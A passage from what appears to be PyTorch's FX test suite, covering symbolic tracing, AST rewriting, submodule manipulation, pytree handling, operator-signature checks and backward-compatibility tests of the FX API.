forward(self, x): return self.linear(x) traced = torch.fx.symbolic_trace(M()) # Do not change this to `capture_stderr` or another context # manager without ensuring that the output is as expected try: traced(torch.rand(5, 5)) except RuntimeError: captured = traceback.format_exc() self.assertNotRegex(captured, r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_graph_module_replicate_for_dp(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) gm = torch.fx.symbolic_trace(Foo()) x = torch.randn(5, 3) out = gm(x) replica = gm._replicate_for_data_parallel() out_replica = replica(x) torch.testing.assert_allclose(out_replica, out) def test_ast_rewriter_rewrites_assert(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_rewrites_assert_with_message(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z, "msg" return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_throw_out_variant(self): def foo(x): y = torch.rand_like(x) torch.sigmoid(x, out=y) return y class MyTracer(torch.fx.Tracer): check_mutable_operations = True tracer = MyTracer() with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'): traced_graph = tracer.trace(foo) def test_ast_rewriter_reassigns_submodules(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.bn = torch.nn.BatchNorm2d(100) def forward(self, x: torch.Tensor): return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_ast_rewriter_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf2", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_profiler_ranges_side_effect(self): g = torch.fx.Graph() handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',)) g.call_function(torch.ops.profiler._record_function_exit, (handle,)) g.output(None) found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) g.eliminate_dead_code() found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) def test_ast_rewriter_wrapped_via_decorator(self): class F(torch.nn.Module): def forward(self, x): return wrapped_via_decorator(x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(F()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(traced).transform() self.assertIn("wrapped_via_decorator", transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_with_submodule", traced.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), traced(input)) def test_submodule_manipulation_API(self): class C(torch.nn.Module): def __init__(self): super(C, self).__init__() self.conv = torch.nn.Conv2d(16, 33, 3, stride=2) self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.conv(torch.cat([self.param, x])) class B(torch.nn.Module): def __init__(self): super(B, self).__init__() self.linear = torch.nn.Linear(100, 200) self.register_buffer("buf", torch.randn(2, 3)) self.net_c = C() def forward(self, x): return self.linear(torch.cat([self.buf, self.net_c(x)])) class A(torch.nn.Module): def __init__(self): super(A, self).__init__() self.net_b = B() self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.net_b(x) + self.param a = symbolic_trace(A()) a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2)) conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1] with a.graph.inserting_before(conv): with warnings.catch_warnings(record=True) as w: dropout = a.graph.call_module(module_name="net_b.net_c.dropout", args=conv.args) self.assertEqual(len(w), 0) conv.replace_all_uses_with(dropout) a.graph.erase_node(conv) a.recompile() def module_exists(gm: GraphModule, path: str) -> bool: return any(path == name for name, _ in gm.named_modules()) def parameter_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_parameters()) and any(path == name for name in gm.state_dict().keys())) def buffer_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_buffers()) and any(path == name for name in gm.state_dict().keys())) # Test that we added the "dropout" submodule self.assertTrue(module_exists(a, "net_b.net_c.dropout")) # Test `get_submodule` with an added submodule self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout")) # Test that the "conv" submodule is still there self.assertTrue(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with an original module self.assertIsNotNone(a.get_submodule("net_b.net_c.conv")) # Test that the "conv" node is NOT still there conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"] self.assertEqual(conv, []) a.delete_submodule("net_b.net_c.conv") # Test that the "conv" submodule is now gone self.assertFalse(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with a deleted submodule with self.assertRaisesRegex(AttributeError, "has no attribute " "`conv`"): self.assertIsNone(a.get_submodule("net_b.net_c.conv")) # Test `get_attr` warnings cat = [n for n in a.graph.nodes if n.target == torch.cat][-1] with a.graph.inserting_before(cat): with warnings.catch_warnings(record=True) as w: param = a.graph.get_attr(qualified_name="net_b.net_c.param") self.assertEqual(len(w), 0) with self.assertWarnsRegex(UserWarning, "Attempted to " "insert a get_attr Node with no " "underlying reference in the " "owning GraphModule"): bad_param = a.graph.get_attr(qualified_name="net_b.param") a.graph.erase_node(bad_param) cat.args = (*cat.args, param) a.recompile() a.graph.lint() # Test `get_parameter` a.get_parameter("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "is not an " "nn.Parameter"): a.get_parameter("net_b.buf") with self.assertRaisesRegex(AttributeError, "has no attribute " "`param`"): a.get_parameter("net_b.param") # Test `get_buffer` a.get_buffer("net_b.buf") with self.assertRaisesRegex(AttributeError, "is not a " "buffer"): a.get_buffer("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "has no attribute " "`buf`"): a.get_buffer("net_b.net_c.buf") # Test non-nested attributes a.get_submodule("") a.get_parameter("param") # Insert some unused submodules a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2)) a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100)) # Garbage collection a.delete_all_unused_submodules() # Test that all the unused submodules are gone self.assertFalse(module_exists(a, "net_b.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.rnn")) self.assertFalse(module_exists(a, "batch_norm_2d")) # Test that we didn't delete any unused Parameters or buffers self.assertTrue(parameter_exists(a, "net_b.net_c.param")) self.assertTrue(buffer_exists(a, "net_b.buf")) a.graph.lint() def test_delete_unused_submodules_leaf(self): class SubModule(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(10, 10) self.relu = torch.nn.ReLU() def forward(self, x): x = self.linear(x) x = self.relu(x) return x class Model(torch.nn.Module): def __init__(self): super().__init__() self.submod = SubModule() def forward(self, x): x = self.submod(x) return x model = Model() class MyCustomTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return module_qualified_name == "submod" inputs = torch.randn(1, 10) traced_graph = MyCustomTracer().trace(model) gm2 = torch.fx.GraphModule(model, traced_graph) gm2.delete_all_unused_submodules() torch.testing.assert_allclose(gm2(inputs), model(inputs)) def test_tracing_graphmodules_as_leaf_submodules(self): class A(torch.nn.Module): def forward(self, t): return t + t class B(torch.nn.Module): def __init__(self): super(type(self), self).__init__() self.calling = False self.called = False def forward(self, t): if self.calling: return t - t else: return t + t def __call__(self, *args): self.called = True self.calling = True return super(type(self), self).__call__(*args) self.calling = False class M(torch.nn.Module): def __init__(self, a, b): super().__init__() self.a = a self.b = b def forward(self, t): x = self.a(t) y = self.b(t) return x + y class LeafTracer(Tracer): def is_leaf_module(self, module, name): return True class LeafTracerNotB(Tracer): def is_leaf_module(self, module, name): return False if "b" in name else True # Recompile calls added "for fun", since they # chain __call__ wrappers. # # Test: B as a regular, non-leaf module # a = symbolic_trace(A()) a.recompile() m = M(a, B()) graph = LeafTracerNotB().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is not treated as leaf. self.assertFalse(hasattr(gm, "b")) # Test assert custom __call__ on submodule b was honored. match = [ n for n in gm.graph.nodes if n.op == "call_function" and n.target == operator.sub ] self.assertTrue(len(match) == 1) # # Test: B as a regular, leaf module # symbolic_trace should only patch torch.nn.Module.__call__, # which means B.__call__ should still execute # a = symbolic_trace(A()) a.recompile() b = B() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is leaf: self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) # Test b.__call__ was run self.assertTrue(b.called) self.assertTrue(gm.get_submodule("b").called) # # Test: B as GraphModule leaf # __call__ not honored since symbolic_trace directly invokes forward() # a = symbolic_trace(A()) a.recompile() b = symbolic_trace(B()) b.recompile() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer("my_buff", torch.rand(3, 4)) self.register_parameter( "my_param", torch.nn.Parameter(torch.rand(3, 4)) ) def forward(self, x): return x + self.my_buff + self.my_param mod = MyModule() mod_traced = symbolic_trace(mod) # Create new GraphModule based on original, either w/ dict or root module. orig_buff = mod_traced.get_buffer("my_buff") orig_param = mod_traced.get_parameter("my_param") mod_traced_new = GraphModule( {"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod, mod_traced.graph, ) # Check that both my_buff and my_param are found and the same. try: new_buff = mod_traced_new.get_buffer("my_buff") except Exception: self.fail("Did not find my_buff") self.assertEqual(orig_buff, new_buff) try: new_param = mod_traced_new.get_parameter("my_param") except Exception: self.fail("Did not find my_param") self.assertEqual(orig_param, new_param) x = torch.rand(3, 4) orig_out = mod_traced(x) submodules_out = mod_traced_new(x) self.assertEqual(orig_out, submodules_out) def test_graph_module_init_buffer_param_copied_dict_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=True) def test_graph_module_init_buffer_param_copied_mod_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=False) def test_annotations_with_no_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: torch.Tensor, a: A) -> torch.Tensor: return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor': return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor: return a(x[0]) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor': return a(x)[0] self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) @unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature " "`annotations` is not defined in Python <3.7") def test_annotation_with_future(self): try: import fx.test_future # noqa: F401 finally: del sys.modules["__future__"] def test_annotations_empty_tuple(self): class Foo(torch.nn.Module): def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]): return "foo" traced = torch.fx.symbolic_trace(Foo()) x = () y = ("bar", ()) traced(x, y) FileCheck().check("_Tuple[()]") \ .check("typing_Tuple[str,typing_Tuple[()]]") \ .run(traced.code) scripted = torch.jit.script(traced) scripted(x, y) FileCheck().check("Tuple[()]") \ .check("Tuple[str, Tuple[()]]") \ .run(scripted.code) def test_pytree(self): def f_sum(x): return sum(x) def f_sum_dict(x): out = 0 for k, v in x.items(): out += v return out def f_dict_list_map(x): new_dict = {} for k, v in x.items(): new_dict[k] = [i + 1 for i in v] return new_dict def f_dict_add(x): return x['a'] + sum(x['z']) def f_namedtuple_add(x): return x.x + x.y pytree._register_pytree_node( Foo, lambda x: ([x.a, x.b], None), lambda x, _: Foo(x[0], x[1]), ) fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b]) def f_custom(x): return x.a + x.b def f_custom_dict(x): return f_sum_dict(x.a) + x.b def f_return_custom(x): return Foo(x.b, x.a) tests = [ (f_sum, [PH, PH, PH]), (f_sum, []), (f_sum_dict, {'a': PH, 'b': PH, 'c': PH}), (f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}), (f_dict_list_map, {5: (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': []}), (f_custom, Foo(PH, PH)), (f_custom, Foo(PH, 3)), (f_custom_dict, Foo({'a': PH, 'b': PH}, PH)), # (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees (f_namedtuple_add, Point(PH, PH)), ] def verify_pytree(f, inp): val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]]) orig_out = f(val) nf = symbolic_trace(f, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) nf = symbolic_trace(nf) self.assertEqual(nf(val), orig_out) assert "tree_flatten_spec" not in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1) nf = symbolic_trace(nf, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) pickled = pickle.dumps(nf) nf = pickle.loads(pickled) self.assertEqual(nf(val), orig_out) for f, inp in tests: verify_pytree(f, inp) def test_pytree_concrete(self): def f(b, a): if b: return a['a'] else: return a['z'] inp = {'a': {'a': PH, 'z': PH}, 'b': True} nf = symbolic_trace(f, concrete_args=inp) val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) self.assertEqual(nf(**val), f(**val)) nf = symbolic_trace(nf) self.assertEqual(nf(**val), f(**val)) def run_getitem_target(): from torch.fx._symbolic_trace import _wrapped_methods_to_patch _wrapped_methods_to_patch.append((torch.Tensor, "__getitem__")) try: TestFX().getitem_inner() finally: _wrapped_methods_to_patch.pop() class TestOperatorSignatures(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag @onlyCPU @ops(op_db, allowed_dtypes=(torch.float,)) def test_get_torch_func_signature_exhaustive(self, device, dtype, op): if not isinstance(op.op, types.BuiltinFunctionType): raise unittest.SkipTest("This path doesn't work on Python functions") sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False) schemas = get_signature_for_torch_op(op.op) if not schemas: raise RuntimeError('No Schemas Returned') for sample_input in sample_inputs_itr: # Iterate through overloads until we hit a match. If we exit this # loop via `else`, we haven't found a match for schema in schemas: try: bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs) bound_args.apply_defaults() op(*bound_args.args, **bound_args.kwargs) break except TypeError as e: pass else: raise RuntimeError(f'Did not match any schemas for op {op.name}!') class TestFXAPIBackwardCompatibility(JitTestCase): def setUp(self): self.maxDiff = None # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def _fn_to_stable_annotation_str(self, obj): """ Unfortunately we have to serialize function signatures manually since serialization for `inspect.Signature` objects is not stable across python versions """ fn_name = torch.typename(obj) signature = inspect.signature(obj) sig_str = f'{fn_name}{signature}' arg_strs = [] for k, v in signature.parameters.items(): maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\ if v.annotation is not inspect.Signature.empty else '' def default_val_str(val): if isinstance(val, (tuple, list)): str_pieces = ['(' if isinstance(val, tuple) else '['] str_pieces.append(', '.join(default_val_str(v) for v in val)) if isinstance(val, tuple) and len(str_pieces) == 2: str_pieces.append(',') str_pieces.append(')' if isinstance(val, tuple) else ']') return ''.join(str_pieces) # Need to fix up some default value strings. # First case: modules. Default module `repr` contains the FS path of the module. # Don't leak that if isinstance(val, types.ModuleType): return f'<module {val.__name__}>' # Second case: callables. Callables (such as lambdas) encode their address in # their string repr. Don't do that if callable(val): return f'<function {val.__name__}>' return str(val) if v.default is not inspect.Signature.empty: default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'" maybe_default = f' = {default_val_str}' else: maybe_default = '' maybe_stars = '' if v.kind == inspect.Parameter.VAR_POSITIONAL: maybe_stars = '*' elif v.kind == inspect.Parameter.VAR_KEYWORD: maybe_stars = '**' arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}') return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\ if signature.return_annotation is not inspect.Signature.empty else '' return f'{fn_name}({", ".join(arg_strs)}){return_annot}' def _annotation_type_to_stable_str(self, t, sig_str): if t is inspect.Signature.empty: return '' # Forward ref if isinstance(t, str): return f"'{t}'" if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef): return t.__forward_arg__ if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef): return t.__forward_arg__ trivial_mappings = { str : 'str', int : 'int', float: 'float', bool: 'bool', torch.dtype: 'torch.dtype', torch.Tensor: 'torch.Tensor', torch.device: 'torch.device', torch.memory_format: 'torch.memory_format', slice: 'slice', torch.nn.Module: 'torch.nn.modules.module.Module', torch.fx.Graph : 'torch.fx.graph.Graph', torch.fx.Node : 'torch.fx.node.Node', torch.fx.Proxy : 'torch.fx.proxy.Proxy', torch.fx.node.Target : 'torch.fx.node.Target', torch.fx.node.Argument : 'torch.fx.node.Argument', torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode', torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule', torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match', Ellipsis : '...', typing.Any: 'Any', type(None): 'NoneType', None: 'None', typing.Iterator: 'Iterator', } mapping = trivial_mappings.get(t, None) if mapping: return mapping # Handle types with contained types contained = getattr(t, '__args__', None) or [] # Callables contain a bare List for arguments contained = t if isinstance(t, list) else contained # Python 3.8 puts type vars into __args__ for unbound types such as Dict if all(isinstance(ct, typing.TypeVar) for ct in contained): contained = [] contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained] contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else '' origin = getattr(t, '__origin__', None) if origin is None: # Unbound types don't have `__origin__` in some Python versions, so fix that up here. origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin if origin in {tuple, typing.Tuple}: return f'Tuple{contained_type_str}' if origin in {typing.Union}: # Annoying hack to detect Optional if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)): not_none_param = contained[0] if contained[0] is not type(None) else contained[1] return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]' return f'Union{contained_type_str}' if origin in {dict, typing.Dict}: return f'Dict{contained_type_str}' if origin in {list, typing.List}: return f'List{contained_type_str}' if origin in {type, typing.Type}: return f'Type{contained_type_str}' if isinstance(t, typing.Callable): if len(contained) > 0 and contained[0] is not Ellipsis: return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]' else: return f'Callable{contained_type_str}' raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.' f'Please add support for this type and confirm with the ' f'FX team that your signature change is valid.') def test_function_back_compat(self): """ Test backward compatibility for function signatures with @compatibility(is_backward_compatible=True). Currently this checks for exact signature matches, which may lead to false positives. If this becomes too annoying, we can refine this check to actually parse out the saved schema strings and check if the change is truly backward- incompatible. """ signature_strs = [] for obj in _BACK_COMPAT_OBJECTS: if not isinstance(obj, type): signature_strs.append(self._fn_to_stable_annotation_str(obj)) signature_strs.sort() try: self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \ f"as backwards-compatible has experienced a signature change. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_class_member_back_compat(self): """ Test backward compatibility for members of classes with @compatibility(is_backward_compatible=True). Currently this checks for exact matches on the publicly visible members of the class. """ class_method_strs = [] for obj in _BACK_COMPAT_OBJECTS: if isinstance(obj, type): public_members = [name for name in obj.__dict__ if not name.startswith('_')] class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}') class_method_strs.sort() try: self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \ f"as backwards-compatible has experienced change in its public members. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_public_api_surface(self): non_back_compat_objects = {} def check_symbols_have_bc_designation(m, prefix): if not m.__name__.startswith('torch.fx'): return if m.__name__.startswith('torch.fx.experimental'): return for k, v in m.__dict__.items(): if v is m: continue if k.startswith('_'): continue if isinstance(v, types.ModuleType): check_symbols_have_bc_designation(v, prefix + [k]) elif isinstance(v, type) or isinstance(v, types.FunctionType): if v not in _MARKED_WITH_COMATIBLITY: non_back_compat_objects.setdefault(v) check_symbols_have_bc_designation(torch.fx, ['torch', 'fx']) check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes']) non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()] # Only want objects in torch.fx non_back_compat_strs = [ s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')] # Only want objects in public namespaces non_back_compat_strs = [ s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))] non_back_compat_strs.sort() if len(non_back_compat_strs) != 0: raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a " f"backwards-compatibility classification! Please decorate these " f"API(s) with `@torch.fx._compatibility.compatibility` to specify " f"BC guarantees.") class TestFunctionalTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary", "has_torch_function_variadic", "handle_torch_function", "boolean_dispatch") TO_PATCH = {"has_torch_function": None, "has_torch_function_unary": None, "has_torch_function_variadic": None} BUILT_IN_FUNC = (AssertionError, "") PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable") PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default") ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$") CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow") INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined") MUTABLE = (RuntimeError, r"Tried to trace mutable operation") UNTRACEABLE_FUNCTIONALS = { "adaptive_avg_pool1d": BUILT_IN_FUNC, "avg_pool1d": BUILT_IN_FUNC, "avg_pool2d": BUILT_IN_FUNC, "avg_pool3d": BUILT_IN_FUNC, "celu_": BUILT_IN_FUNC, "channel_shuffle": BUILT_IN_FUNC, "conv1d": BUILT_IN_FUNC, "conv2d": BUILT_IN_FUNC, "conv3d": BUILT_IN_FUNC, "conv_tbc": BUILT_IN_FUNC, "conv_transpose1d": BUILT_IN_FUNC, "conv_transpose2d": BUILT_IN_FUNC, "conv_transpose3d": BUILT_IN_FUNC, "cosine_similarity": BUILT_IN_FUNC, "elu_": BUILT_IN_FUNC, "hardtanh_": BUILT_IN_FUNC, "leaky_relu_": BUILT_IN_FUNC, "logsigmoid": BUILT_IN_FUNC, "one_hot": BUILT_IN_FUNC, "pdist": BUILT_IN_FUNC, "pixel_shuffle": BUILT_IN_FUNC, "pixel_unshuffle": BUILT_IN_FUNC, "relu_": BUILT_IN_FUNC, "rrelu_": BUILT_IN_FUNC, "selu_": BUILT_IN_FUNC, "softplus": BUILT_IN_FUNC, "softshrink": BUILT_IN_FUNC, "threshold_": BUILT_IN_FUNC, "adaptive_avg_pool2d": LEN_ERROR, "adaptive_avg_pool3d": LEN_ERROR, "adaptive_max_pool2d_with_indices": LEN_ERROR, "adaptive_max_pool3d_with_indices": LEN_ERROR, "instance_norm": CONTROL_FLOW, "pad": LEN_ERROR, "adaptive_max_pool1d": PROXY_ITERABLE, "adaptive_max_pool2d": PROXY_ITERABLE, "adaptive_max_pool3d": PROXY_ITERABLE, "fractional_max_pool2d": PROXY_ITERABLE, "fractional_max_pool3d": PROXY_ITERABLE, "max_pool1d": PROXY_ITERABLE, "max_pool2d": PROXY_ITERABLE, "max_pool3d": PROXY_ITERABLE, "group_norm": PROXY_ITERATED, "lp_pool2d": PROXY_ITERATED, "max_unpool1d": PROXY_ITERATED, "max_unpool2d": PROXY_ITERATED, "max_unpool3d": PROXY_ITERATED, "adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH, "gelu": ARG_TYPE_MISMATCH, "hardshrink": ARG_TYPE_MISMATCH, 